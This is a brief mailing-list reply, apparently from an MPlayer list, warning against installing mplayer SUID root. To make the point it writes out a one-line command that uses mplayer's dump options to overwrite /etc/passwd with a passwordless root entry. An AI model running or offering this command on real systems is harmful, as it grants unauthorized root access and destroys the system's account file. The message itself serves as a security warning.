Joonas Koivunen <rzei at mbnet.fi> writes:

> Well what if someone gains access on a system where gmplayer ran with SUID, 
> wouldn't it be possible to gain root shell via this exploit?

if mplayer is suid root, then you don't need any exploit.

  echo "root::0:0:b1g h4x0r:/root:/bin/bash" | \
  mplayer -dumpstream -dumpfile /etc/passwd -

so NEVER suid mplayer. But this is in TFM.
